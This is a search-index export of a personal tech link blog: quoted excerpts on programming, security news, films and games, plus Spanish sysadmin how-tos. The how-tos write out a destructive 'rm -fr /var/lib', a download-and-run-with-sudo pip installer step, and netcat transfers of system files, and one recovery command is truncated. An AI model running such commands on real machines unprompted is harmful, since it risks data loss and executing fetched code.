capabilities:\nRead a file of text, determine the n most frequently used words, and\nprint out a sorted list of those words along with their frequencies.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Dr. Drang | \u003ca href=\"http://www.leancrew.com/all-this/2011/12/more-shell-less-egg/\"\u003eleancrew.com\u003c/a\u003e\u003c/p\u003e","title":"More shell, less egg"},{"content":" The Old Testament is full of examples of chiasmus, which is a figure of speech used in ancient times to emphasize balance. It lists a bunch of ideas or things and then repeats each of them in reverse order. It’s often not an identical repetition. It frequently uses the opposite of what came before or something similar to it.\n» Robert Lockard | dejareviewer.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/21/robocop-1987-is-an-almost-perfectly-symmetrical-film/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe Old Testament is full of examples of chiasmus, which is a figure\nof speech used in ancient times to emphasize balance. It lists a bunch\nof ideas or things and then repeats each of them in reverse order.\nIt’s often not an identical repetition. It frequently uses the\nopposite of what came before or something similar to it.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Robert Lockard | \u003ca href=\"http://dejareviewer.com/2014/04/29/cinematic-chiasmus-robocop-is-almost-perfectly-symmetrical-film/\"\u003edejareviewer.com\u003c/a\u003e\u003c/p\u003e","title":"RoboCop (1987) Is an Almost Perfectly Symmetrical Film"},{"content":" There was a time not so long ago when Minecraft was actually a game. Now, it’s an insane sandbox where people build all kinds of incredibly complex things… like a word processor… out of blocks. This crazy contraption is the work of a a third-year robotics student who goes by the name of Koala_Steamed on YouTube. It’s the result of nearly two years of painstaking work inside the Minecraft world. That’s not continuous, mind you. Breaks were obviously taken to do things like attend classes, use the washroom, and interact with people and things that had curves.\n» Lee Mathews | geek.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/18/functional-word-processor-built-in-minecraft/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere was a time not so long ago when Minecraft was actually a game.\nNow, it’s an insane sandbox where people build all kinds of incredibly\ncomplex things… like a word processor… out of blocks. This crazy\ncontraption is the work of a a third-year robotics student who goes by\nthe name of Koala_Steamed on YouTube. It’s the result of nearly two\nyears of painstaking work inside the Minecraft world. That’s not\ncontinuous, mind you. Breaks were obviously taken to do things like\nattend classes, use the washroom, and interact with people and things\nthat had curves.\u003c/p\u003e","title":"Functional word processor built in Minecraft"},{"content":" The dynamic creation and destruction of objects was always one of the bugbears of C. It required the programmer to (manually) control the allocation of memory for the object, handle the object’s initialisation then ensure that the object was safely cleaned-up after use and its memory returned to the heap. Because many C programmers weren’t educated in the potential problems (or were just plain lazy or delinquent in their programming) C got a reputation in some quarters for being an unsafe, memory-leaking language.\n» Glennan Carnie | blog.feabhas.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/18/the-rule-of-the-big-three-and-a-half-resource-management-in-c/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe dynamic creation and destruction of objects was always one of the\nbugbears of C. It required the programmer to (manually) control the\nallocation of memory for the object, handle the object’s\ninitialisation then ensure that the object was safely cleaned-up after\nuse and its memory returned to the heap. Because many C programmers\nweren’t educated in the potential problems (or were just plain lazy or\ndelinquent in their programming) C got a reputation in some quarters\nfor being an unsafe, memory-leaking language.\u003c/p\u003e","title":"The Rule of The Big Three (and a half) – Resource Management in C++"},{"content":" Using HSTS to track your browsing habits evades the features of web browsers designed to control more normal ”cookie” based tracking mechanisms. Using ”incognito” or ”private” modes means that existing cookies won’t be shared with sites you visit. Browsers also let you entirely delete cookies that could be used to track you. Because HSTS is a security feature and isn’t intended to be used for tracking, web browsers treat it differently from cookies. It is only by intentional misapplication that HSTS can be exploited to track users.\n» Sam Greenhalgh | radicalresearch.co.uk\n","permalink":"http://karpoke.ignaciocano.com/2015/01/11/hsts-super-cookies/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUsing HSTS to track your browsing habits evades the features of web\nbrowsers designed to control more normal ”cookie” based tracking\nmechanisms. Using ”incognito” or ”private” modes means that existing\ncookies won’t be shared with sites you visit. Browsers also let you\nentirely delete cookies that could be used to track you. Because HSTS\nis a security feature and isn’t intended to be used for tracking, web\nbrowsers treat it differently from cookies. It is only by intentional\nmisapplication that HSTS can be exploited to track users.\u003c/p\u003e","title":"HSTS Super Cookies"},{"content":" HipHop Virtual Machine, or HHVM, reduces the median page-saving time for editors from about 7.5 seconds to 2.5 seconds, and the mean page-saving time from about 6 to 3 seconds. Below, I’ll explain the technical background for HHVM on MediaWiki and some of the far-reaching benefits of this change that will go beyond the recent performance gains.\n» Ori Livneh | blog.wikimedia.org\n","permalink":"http://karpoke.ignaciocano.com/2015/01/11/how-we-made-editing-wikipedia-twice-as-fast/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHipHop Virtual Machine, or HHVM, reduces the median page-saving time\nfor editors from about 7.5 seconds to 2.5 seconds, and the mean\npage-saving time from about 6 to 3 seconds. Below, I’ll explain the\ntechnical background for HHVM on MediaWiki and some of the\nfar-reaching benefits of this change that will go beyond the recent\nperformance gains.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Ori Livneh | \u003ca href=\"https://blog.wikimedia.org/2014/12/29/how-we-made-editing-wikipedia-twice-as-fast/\"\u003eblog.wikimedia.org\u003c/a\u003e\u003c/p\u003e","title":"How we made editing Wikipedia twice as fast"},{"content":" Two-player limit Texas hold’em poker has finally been solved, according to a study published in Science today. Scientists have designed a computer program, named Cepheus, with a strategy for the game that is so close to perfect that statistical analysis shows it can’t be defeated by a human poker player, even if that player competed against the computer for an entire lifetime. This means that no matter how the game starts out, the computer will win or break even in the long run — making it essentially unbeatable. » Cepheus\n» Arielle Duhaime-Ross | theverge.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/10/an-unbeatable-computer-program-has-finally-solved-two-player-limit-texas-holdem-poker/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTwo-player limit Texas hold’em poker has finally been solved,\naccording to a study published in Science today. Scientists have\ndesigned a computer program, named Cepheus, with a strategy for the\ngame that is so close to perfect that statistical analysis shows it\ncan’t be defeated by a human poker player, even if that player\ncompeted against the computer for an entire lifetime. This means that\nno matter how the game starts out, the computer will win or break even\nin the long run — making it essentially unbeatable. » \u003ca href=\"http://poker.srv.ualberta.ca/\"\u003eCepheus\u003c/a\u003e\u003c/p\u003e","title":"An unbeatable computer program has finally solved two-player limit Texas hold’em poker"},{"content":" The background is set, you know why I took interest now it’s time to tell what solidified the decision. Each change made to the OpenBSD codebase undergoes a code review before it’s committed to the tree. If you managed to get that far in this article you perfectly know why I deem that of upmost importance. No matter how many features your software has, if your documentation is sub-par then your software is most likely useless. The quality of OpenBSD documentation is on a level I didn’t expect even after reading about it in so many places. Not only will you get information on how something works, what’s possible and how to use it. It will also tell you the best practices for using the tool and warn you about the common pitfalls.\n» homing-on-code.blogspot.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/06/code-rot-openbsd/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe background is set, you know why I took interest now it’s time to\ntell what solidified the decision. Each change made to the OpenBSD\ncodebase undergoes a code review before it’s committed to the tree. If\nyou managed to get that far in this article you perfectly know why I\ndeem that of upmost importance. No matter how many features your\nsoftware has, if your documentation is sub-par then your software is\nmost likely useless. The quality of OpenBSD documentation is on a\nlevel I didn’t expect even after reading about it in so many places.\nNot only will you get information on how something works, what’s\npossible and how to use it. It will also tell you the best practices\nfor using the tool and warn you about the common pitfalls.\u003c/p\u003e","title":"Code rot \u0026 OpenBSD"},{"content":" Reading the documents, I have the feeling that the NSA can 1) decrypt weak crypto and 2) steal keys. Let’s focus on the crypto first. SSH supports different key exchange algorithms, ciphers and message authentication codes. The server and the client choose a set of algorithms supported by both, then proceed with the key exchange. Some of the supported algorithms are not so great and should be disabled completely. If you leave them enabled but prefer secure algorithms, then a man in the middle might downgrade you to bad ones. This hurts interoperability but everyone uses OpenSSH anyway.\n» stribika.github.io\n","permalink":"http://karpoke.ignaciocano.com/2015/01/06/secure-secure-shell/","summary":"\u003cblockquote\u003e\n\u003cp\u003eReading the documents, I have the feeling that the NSA can 1) decrypt\nweak crypto and 2) steal keys. Let’s focus on the crypto first. SSH\nsupports different key exchange algorithms, ciphers and message\nauthentication codes. The server and the client choose a set of\nalgorithms supported by both, then proceed with the key exchange. Some\nof the supported algorithms are not so great and should be disabled\ncompletely. If you leave them enabled but prefer secure algorithms,\nthen a man in the middle might downgrade you to bad ones. This hurts\ninteroperability but everyone uses OpenSSH anyway.\u003c/p\u003e","title":"Secure Secure Shell"},{"content":" Software for MS-DOS machines that represent entertainment and games. The collection includes action, strategy, adventure and other unique genres of game and entertainment software. Through the use of the EM-DOSBOX in-browser emulator, these programs are bootable and playable. Please be aware this browser-based emulation is still in beta - contact Jason Scott, Software Curator, if there are issues or questions.\n» archive.org\n","permalink":"http://karpoke.ignaciocano.com/2015/01/05/software-library-ms-dos-games/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSoftware for MS-DOS machines that represent entertainment and games.\nThe collection includes action, strategy, adventure and other unique\ngenres of game and entertainment software. Through the use of the\nEM-DOSBOX in-browser emulator, these programs are bootable and\nplayable. Please be aware this browser-based emulation is still in\nbeta - contact Jason Scott, Software Curator, if there are issues or\nquestions.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"https://archive.org/details/softwarelibrary_msdos_games/v2\"\u003earchive.org\u003c/a\u003e\u003c/p\u003e","title":"Software Library: MS-DOS Games"},{"content":"Si al ejecutar pip nos encontramos con el siguiente error:\nTraceback (most recent call last): File \u0026#34;/usr/bin/pip\u0026#34;, line 9, in load_entry_point(\u0026#39;pip==1.5.4\u0026#39;, \u0026#39;console_scripts\u0026#39;, \u0026#39;pip\u0026#39;)() File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 352, in load_entry_point return get_distribution(dist).load_entry_point(group, name) File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2307, in load_entry_point return ep.load() File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2021, in load entry = __import__(self.module_name, globals(),globals(), [\u0026#39;__name__\u0026#39;]) File \u0026#34;/usr/lib/python2.7/dist-packages/pip/__init__.py\u0026#34;, line 11, in from pip.vcs import git, mercurial, subversion, bazaar # noqa File \u0026#34;/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py\u0026#34;, line 9, in from pip.download import path_to_url File \u0026#34;/usr/lib/python2.7/dist-packages/pip/download.py\u0026#34;, line 25, in from requests.compat import IncompleteRead ImportError: cannot import name IncompleteRead Parece ser debido a un problema entre el paquete requests y pip. A partir de las versión 2.4.0 de requests se eliminó requests.compat.IncompleteRead. Sin embargo, las versiones de pip anteriores a julio de 2014 aún utilizan IncompleteRead.\nEn la vesión actual de pip ya no ocurre este problema por lo que la solución pasa por actualizarlo:\n$ wget https://bootstrap.pypa.io/get-pip.py $ sudo python get-pip.py ","permalink":"http://karpoke.ignaciocano.com/2015/01/02/solucionado-el-error-importerror-cannot-import-name-incompleteread-al-ejecutar-pip-en-ubuntu-trusty-tahr-14-04/","summary":"\u003cp\u003eSi al ejecutar \u003ccode\u003epip\u003c/code\u003e nos encontramos con el siguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eTraceback (most recent call last):\n  File \u0026#34;/usr/bin/pip\u0026#34;, line 9, in\n    load_entry_point(\u0026#39;pip==1.5.4\u0026#39;, \u0026#39;console_scripts\u0026#39;, \u0026#39;pip\u0026#39;)()\n  File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 352, in load_entry_point\n    return get_distribution(dist).load_entry_point(group, name)\n  File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2307, in load_entry_point\n    return ep.load()\n  File \u0026#34;/usr/local/lib/python2.7/dist-packages/pkg_resources.py\u0026#34;, line 2021, in load\n    entry = __import__(self.module_name, globals(),globals(), [\u0026#39;__name__\u0026#39;])\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pip/__init__.py\u0026#34;, line 11, in\n    from pip.vcs import git, mercurial, subversion, bazaar # noqa\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py\u0026#34;, line 9, in\n    from pip.download import path_to_url\n  File \u0026#34;/usr/lib/python2.7/dist-packages/pip/download.py\u0026#34;, line 25, in\n    from requests.compat import IncompleteRead\nImportError: cannot import name IncompleteRead\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eParece ser debido a un \u003ca href=\"http://stackoverflow.com/a/27341847\"\u003eproblema entre el paquete \u003ccode\u003erequests\u003c/code\u003e y \u003ccode\u003epip\u003c/code\u003e\u003c/a\u003e.\nA partir de las \u003ca href=\"https://github.com/tweepy/tweepy/issues/501\"\u003eversión 2.4.0\u003c/a\u003e de \u003ccode\u003erequests\u003c/code\u003e se eliminó\n\u003ccode\u003erequests.compat.IncompleteRead\u003c/code\u003e. Sin embargo, las versiones de \u003ccode\u003epip\u003c/code\u003e\nanteriores a \u003ca href=\"https://github.com/pypa/pip/blob/0dedf2b6f5adefcc29d3d295318a7ebc916fc822/pip/download.py\"\u003ejulio de 2014\u003c/a\u003e aún utilizan \u003ccode\u003eIncompleteRead\u003c/code\u003e.\u003c/p\u003e","title":"Solucionado el error «ImportError: cannot import name IncompleteRead» al ejecutar pip en Ubuntu Trusty Tahr 14.04"},{"content":" Monkey Island es uno de los videojuegos más míticos de todos los tiempos. Está lleno de pequeñas curiosidades, anécdotas y huevos de pascua. Estas son 10 de nuestras favoritas.\n» Carlos Rebato | gizmodo.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/01/homenaje-a-un-clasico-las-10-mejores-curiosidades-de-monkey-island/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMonkey Island es uno de los videojuegos más míticos de todos los\ntiempos. Está lleno de pequeñas curiosidades, anécdotas y huevos de\npascua. Estas son 10 de nuestras favoritas.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Carlos Rebato | \u003ca href=\"http://es.gizmodo.com/homenaje-a-un-clasico-las-10-mejores-curiosidades-de-m-1674905686\"\u003egizmodo.com\u003c/a\u003e\u003c/p\u003e","title":"Homenaje a un clásico: las 10 mejores curiosidades de Monkey Island"},{"content":" A summary of some problems I faced when tinkering with Quake to get it play nicely on an oscilloscope. After seeing some cool clips like this mushroom thing and of course Youscope, playing Quake on a scope seemed like a great idea. It ticks all the marks that make me happy: low-poly, realtime rendered and open source.\n» Pekka Väänänen | lofibucket.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/01/quake-on-an-oscilloscope-a-technical-report/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA summary of some problems I faced when tinkering with Quake to get it\nplay nicely on an oscilloscope. After seeing some cool clips like this\nmushroom thing and of course Youscope, playing Quake on a scope seemed\nlike a great idea. It ticks all the marks that make me happy:\nlow-poly, realtime rendered and open source.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Pekka Väänänen | \u003ca href=\"http://www.lofibucket.com/articles/oscilloscope_quake.html\"\u003elofibucket.com\u003c/a\u003e\u003c/p\u003e","title":"Quake on an oscilloscope: A technical report"},{"content":" Este jueves, 1 de enero, entra en vigor gran parte de la ley Lassalle de propiedad intelectual y con ella su artículo 32.2, que obliga a los editores y autores a cobrar —aunque no quieran— cuando los agregadores de Internet enlacen y distribuyan sus contenidos. Estos son los aspectos clave a tener en cuenta sobre el denominado canon AEDE.\n» M.M. | 20minutos.es\n","permalink":"http://karpoke.ignaciocano.com/2015/01/01/el-canon-aede-claves-del-presente-y-el-futuro-de-la-tasa-de-agregacion-de-contenidos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEste jueves, 1 de enero, entra en vigor gran parte de la ley Lassalle\nde propiedad intelectual y con ella su artículo 32.2, que obliga a los\neditores y autores a cobrar —aunque no quieran— cuando los agregadores\nde Internet enlacen y distribuyan sus contenidos. Estos son los\naspectos clave a tener en cuenta sobre el denominado canon AEDE.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» M.M. | \u003ca href=\"http://www.20minutos.es/noticia/2333392/0/claves-canon-aede/ley-lassalle/propiedad-intelectual/\"\u003e20minutos.es\u003c/a\u003e\u003c/p\u003e","title":"El ’canon AEDE’: claves del presente y el futuro de la tasa de agregación de contenidos"},{"content":" The Futurama writers had a rule that the show’s more obscure jokes couldn’t be central to the plot. So the background is stuffed with nods to mathematics, science, history, and literature. Numbers are often translated into math problems (instead of Studio 54, the crew visits Studio 1²2¹3³). Robot information is conveyed in binary (”The Honking” references the ”Redrum” scene in The Shining, when Bender is perplexed to see ”0101100101” written in blood on a wall, but then realizes that it reads ”1010011010” in the mirror, a series of digits that translates to ”666”). And of course, there’s the Alienese language. But the writers also built entire episodes around the Banach-Tarski paradox and the premise of three-dimensional characters entering two-dimensional space.\n» Lauren Davis | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/01/10-futurama-jokes-that-will-make-you-smarter/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe Futurama writers had a rule that the show’s more obscure jokes\ncouldn’t be central to the plot. So the background is stuffed with\nnods to mathematics, science, history, and literature. Numbers are\noften translated into math problems (instead of Studio 54, the crew\nvisits Studio 1²2¹3³). Robot information is conveyed in binary (”The\nHonking” references the ”Redrum” scene in The Shining, when Bender is\nperplexed to see ”0101100101” written in blood on a wall, but then\nrealizes that it reads ”1010011010” in the mirror, a series of digits\nthat translates to ”666”). And of course, there’s the Alienese\nlanguage. But the writers also built entire episodes around the\nBanach-Tarski paradox and the premise of three-dimensional characters\nentering two-dimensional space.\u003c/p\u003e","title":"10 Futurama jokes that will make you smarter"},{"content":" In May of this year, LinuxGizmos and Linux.com collaborated on a joint survey, asking our readers to choose their favorite open-spec hacker SBCs from a list of 32 that run Linux and/or Android. Our SBC survey winners, ranked one to five, included the Raspberry Pi, BeagleBone Black, Odroid-XU, CubieTruck, and Banana Pi single board computers. Thanks to the flood of new open-spec, community-backed boards, as well as the demise of others, we have updated our list for this end-of-year snapshot.\n» Eric Brown | linuxgizmos.com\n","permalink":"http://karpoke.ignaciocano.com/2015/01/01/ringing-in-2015-with-40-linux-friendly-hacker-sbcs/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn May of this year, LinuxGizmos and Linux.com collaborated on a joint\nsurvey, asking our readers to choose their favorite open-spec hacker\nSBCs from a list of 32 that run Linux and/or Android. Our SBC survey\nwinners, ranked one to five, included the Raspberry Pi, BeagleBone\nBlack, Odroid-XU, CubieTruck, and Banana Pi single board computers.\nThanks to the flood of new open-spec, community-backed boards, as well\nas the demise of others, we have updated our list for this end-of-year\nsnapshot.\u003c/p\u003e","title":"Ringing in 2015 with 40 Linux-friendly hacker SBCs"},{"content":" Sometime in late summer I took a break with some of the other engineers and went to a local bar on Castro street in Mountain View. The bar was the St. James Infirmary and it had a 30 foot wonder woman statue inside among other interesting things. At some point in the evening I mentioned that it was sad that Lynx was not going to be able to display many of the HTML extensions that we were proposing, I also pointed out that the only text style that Lynx could exploit given its environment was blinking text. We had a pretty good laugh at the thought of blinking text, and talked about blinking this and that and how absurd the whole thing would be.\n» Lou Montulli | montulli.org\n","permalink":"http://karpoke.ignaciocano.com/2014/12/30/the-origins-of-the-tag/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSometime in late summer I took a break with some of the other\nengineers and went to a local bar on Castro street in Mountain View.\nThe bar was the St. James Infirmary and it had a 30 foot wonder woman\nstatue inside among other interesting things. At some point in the\nevening I mentioned that it was sad that Lynx was not going to be able\nto display many of the HTML extensions that we were proposing, I also\npointed out that the only text style that Lynx could exploit given its\nenvironment was blinking text. We had a pretty good laugh at the\nthought of blinking text, and talked about blinking this and that and\nhow absurd the whole thing would be.\u003c/p\u003e","title":"The Origins of the  Tag"},{"content":" It’s an accomplishment all the more remarkable given that the story driving the Foundation Trilogy — an epic tale of the fall and rise of future galactic empires —contains virtually none of the usual tropes that are associated with science fiction. The novels span the entire galaxy, but no extraterrestrials make an appearance. It depicts the future history of human society, but it’s neither explicitly a utopian nor dystopian parable. There’s plenty of futuristic technology—from faster-than-light spacecraft to personal force fields—but all of this serves as the background, not the driver, of the plot. In fact, Foundation appears to contradict Asimov’s own definition of science fiction, as a ”branch of literature which deals with the reaction of human beings to changes in science and technology.” In this case, though, Asimov would later explain that he set out to create a genre he called ”social science fiction.” He used the future as a template to explore a pivotal idea that we’ve been asking for centuries: Are there laws of human history as immutable as the laws of physics?\n» Mark Strauss | io9.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/27/what-absolutely-everyone-needs-to-know-about-isaac-asimovs-foundation/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s an accomplishment all the more remarkable given that the story\ndriving the Foundation Trilogy — an epic tale of the fall and rise of\nfuture galactic empires —contains virtually none of the usual tropes\nthat are associated with science fiction. The novels span the entire\ngalaxy, but no extraterrestrials make an appearance. It depicts the\nfuture history of human society, but it’s neither explicitly a utopian\nnor dystopian parable. There’s plenty of futuristic technology—from\nfaster-than-light spacecraft to personal force fields—but all of this\nserves as the background, not the driver, of the plot. In fact,\nFoundation appears to contradict Asimov’s own definition of science\nfiction, as a ”branch of literature which deals with the reaction of\nhuman beings to changes in science and technology.” In this case,\nthough, Asimov would later explain that he set out to create a genre\nhe called ”social science fiction.” He used the future as a template\nto explore a pivotal idea that we’ve been asking for centuries: Are\nthere laws of human history as immutable as the laws of physics?\u003c/p\u003e","title":"What Absolutely Everyone Needs To Know About Isaac Asimov’s Foundation"},{"content":"Si por casualidad acabamos ejecutando un rm -fr /var/lib, tendremos un pequeño problema. El directorio /var/lib está pensado para que los programas instalados guarden información variable (ver man hier). Puestos a suponer, supongamos que esto es exactamente lo que acaba de pasar, que aún no hemos reiniciado la máquina y que seguimos teniendo acceso por SSH.\nCopias de seguridad En este momento, ya es tarde para pensar en copias de seguridad si no las habíamos hecho antes. Habrá información que hayamos perdido y que sea imposible recuperar, por ejemplo, las bases de datos MySQL. Probablemente, perderemos información importante para los programas y es posible que recuperar el sistema en lugar de reinstalar favorezca que haya toda clase de errores extraños.\nAdemás, tras borrar el directorio /var/lib, programas como dpkg y apt-get o aptitude no funcionarán, ya que guardan información de los programas instalados en directorios como /var/lib/dpkg, /var/lib/apt o /var/lib/aptitude, lo que provoca que la recuperación del sistema sea tediosa.\nRecuperar el instalador El primer paso es poder ejecutar el instalador de paquetes de nuevo, para poder reinstalar todos los paquetes. Para esto, partiremos de un livecd de la misma versión que tengamos instalada y copiaremos el directorio /var/lib/dpkg, en este caso, Ubuntu Server 14.04.1 de 32 bits:\n$ wget http://releases.ubuntu.com/14.04/ubuntu-14.04.1-server-i386.iso Podemos utilizar unetbootin para instalar la distribución en un USB, o como en este caso, ejecutar una máquina virtual con virtualbox y especificando que el disco contenga esa ISO. Arrancamos la máquina virtual y seleccionamos el \u0026ldquo;Modo rescate\u0026rdquo;.\nDesde la consola de rescate, copiaremos el contenido del directorio /var/lib a la máquina en la que hemos sufrido el percance, cuya IP pongamos que sea 192.168.1.100:\n(virtualbox)$ cd /tmp (virtualbox)$ tar -cf lib.tar /var/lib (virtualbox)$ cat lib.tar | nc 192.168.1.100 9090 En la máquina a reparar debemos ejecutar:\n$ mkdir /tmp/recover $ cd /tmp/recover $ sudo ufw allow proto tcp from 192.168.50.0/24 to any port 9090 $ nc -l 9090 | tar x $ sudo ufw delete allow proto tcp from 192.168.50.0/24 to any port 9090 $ sudo chown -R root:root var/lib $ sudo mv var/lib /var Si todo ha ido bien, deríamos poder ejecutar algunos comandos:\n$ sudo dpkg --audit $ sudo apt-get update $ sudo apt-get check $ sudo dpkg --configure -a $ sudo apt-get install -f $ sudo apt-get upgrade Reinstalar todos los programas Podemos encontrar una copia del fichero /var/lib/dpkg/status con toda la información de los paquetes instalados en /var/backups/dpkg.status.0. También podemos revisar el fichero /var/log/apt.log para reinstalar los últimos paquetes añadidos o eliminados:\n$ /var/tmp/packages0.list $ sudo apt-get --reinstall install `cat /var/tmp/packages0.list` Es posible que algunos paquetes den error debido a alguna depedencia que no está correctamente instalada, pero conforme se van reinstalando todos, deberían quedar todos correctamente instalados. Ej:\nE: Couldn\u0026#39;t configure pre-depend dpkg:i386 for mountall:i386, probably a dependency cycle. También iremos viendo avisos como el siguiente, especialmente de aquellos paquetes que necesitaremos reinstalar:\ndpkg: aviso: falta el fichero de lista de ficheros del paquete `python-lxml\u0026#39;, se supondrá que el paquete no tiene ningún fichero actualmente instalado Una vez que termine, nos aseguramos que los ficheros base quedaron bien instalados:\n$ sudo apt-get download base-files $ sudo apt-get install --reinstall base-files Recuperar MySQL MySQL guarda los ficheros de la base de datos en /var/lib/mysql/. Si tuviéramos una copia, recuperar la base de datos sería tan sencillo como ejecutar:\n$ mysql -uroot -p \u0026lt; mysql_backup.sql ","permalink":"http://karpoke.ignaciocano.com/2014/12/26/recuperar-el-sistema-tras-borrar-varlib/","summary":"\u003cp\u003eSi por casualidad acabamos ejecutando un \u003ccode\u003erm -fr /var/lib\u003c/code\u003e, tendremos un\npequeño problema. El directorio /var/lib está pensado para que los\nprogramas instalados guarden información variable (ver \u003ccode\u003eman hier\u003c/code\u003e).\nPuestos a suponer, supongamos que esto es exactamente lo que acaba de\npasar, que aún no hemos reiniciado la máquina y que seguimos teniendo\nacceso por SSH.\u003c/p\u003e\n\u003ch2 id=\"copias-de-seguridad\"\u003eCopias de seguridad\u003c/h2\u003e\n\u003cp\u003eEn este momento, ya es tarde para pensar en copias de seguridad si no\nlas habíamos hecho antes. Habrá información que hayamos perdido y que\nsea imposible recuperar, por ejemplo, \u003ca href=\"http://dev.mysql.com/doc/refman/4.1/en/installation-layouts.html\"\u003elas bases de datos MySQL\u003c/a\u003e.\nProbablemente, perderemos información importante para los programas y es\nposible que recuperar el sistema en lugar de reinstalar favorezca que\nhaya toda clase de errores extraños.\u003c/p\u003e","title":"Recuperar el sistema tras borrar «/var/lib»"},{"content":" More than 12 million routers in homes and small offices are vulnerable to attacks that allow hackers anywhere in the world to monitor user traffic and take administrative control over the devices, researchers said. The vulnerability resides in ”RomPager” software, embedded into the residential gateway devices, made by a company known as AllegroSoft. Versions of RomPager prior to 4.34 contain a critical bug that allows attackers to send simple HTTP cookie files that corrupt device memory and hand over administrative control. Attackers can use that control to read plaintext traffic traveling over the device and possibly take other actions, including changing sensitive DNS settings and monitoring or controling Web cams, computers, or other connected devices. Researchers from Check Point’s malware and vulnerability group have dubbed the bug Misfortune Cookie, because it allows hackers to determine the ”fortune” of an HTTP request by manipulating cookies. » Misfortune Cookie | mis.fortunecook.ie\n» Dan Goodin | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/21/12-million-home-and-business-routers-vulnerable-to-critical-hijacking-hack/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMore than 12 million routers in homes and small offices are vulnerable\nto attacks that allow hackers anywhere in the world to monitor user\ntraffic and take administrative control over the devices, researchers\nsaid. The vulnerability resides in ”RomPager” software, embedded into\nthe residential gateway devices, made by a company known as\nAllegroSoft. Versions of RomPager prior to 4.34 contain a critical bug\nthat allows attackers to send simple HTTP cookie files that corrupt\ndevice memory and hand over administrative control. Attackers can use\nthat control to read plaintext traffic traveling over the device and\npossibly take other actions, including changing sensitive DNS settings\nand monitoring or controling Web cams, computers, or other connected\ndevices. Researchers from Check Point’s malware and vulnerability\ngroup have dubbed the bug Misfortune Cookie, because it allows hackers\nto determine the ”fortune” of an HTTP request by manipulating cookies.\n» Misfortune Cookie | \u003ca href=\"http://mis.fortunecook.ie/\"\u003emis.fortunecook.ie\u003c/a\u003e\u003c/p\u003e","title":"12 million home and business routers vulnerable to critical hijacking hack"},{"content":" We’ve all heard the ”official conspiracy theory” of the Death Star attack. We all know about Luke Skywalker and his ragtag bunch of rebels, how they mounted a foolhardy attack on the most powerful, well-defended battle station ever built. And we’ve all seen the video over, and over, and over, of the one-in-a-million shot that resulted in a massive chain reaction that not just damaged, but completely obliterated that massive technological wonder.\n» debunking911.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/21/was-the-death-star-attack-an-inside-job/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe’ve all heard the ”official conspiracy theory” of the Death Star\nattack. We all know about Luke Skywalker and his ragtag bunch of\nrebels, how they mounted a foolhardy attack on the most powerful,\nwell-defended battle station ever built. And we’ve all seen the video\nover, and over, and over, of the one-in-a-million shot that resulted\nin a massive chain reaction that not just damaged, but completely\nobliterated that massive technological wonder.\u003c/p\u003e","title":"Was the Death Star Attack an Inside Job?"},{"content":" What if your cloud instances could be updated with the same certainty and precision as your mobile phone – with carrier grade assurance that an update applies perfectly or is not applied at all? What if your apps could be isolated from one another completely, so there’s no possibility that installing one app could break another, and stronger assurance that a compromise of one app won’t compromise the data from another? When we set out to build the Ubuntu Phone we took on the challenge of raising the bar for reliability and security in the mobile market. And today that same technology is coming to the cloud, in the form of a new ”snappy” image called Ubuntu Core\n» Mark Shuttleworth | markshuttleworth.com\n","permalink":"http://karpoke.ignaciocano.com/2014/12/09/announcing-ubuntu-core-with-snappy-transactional-updates/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat if your cloud instances could be updated with the same certainty\nand precision as your mobile phone – with carrier grade assurance that\nan update applies perfectly or is not applied at all? What if your\napps could be isolated from one another completely, so there’s no\npossibility that installing one app could break another, and stronger\nassurance that a compromise of one app won’t compromise the data from\nanother? When we set out to build the Ubuntu Phone we took on the\nchallenge of raising the bar for reliability and security in the\nmobile market. And today that same technology is coming to the cloud,\nin the form of a new ”snappy” image called Ubuntu Core\u003c/p\u003e","title":"Announcing 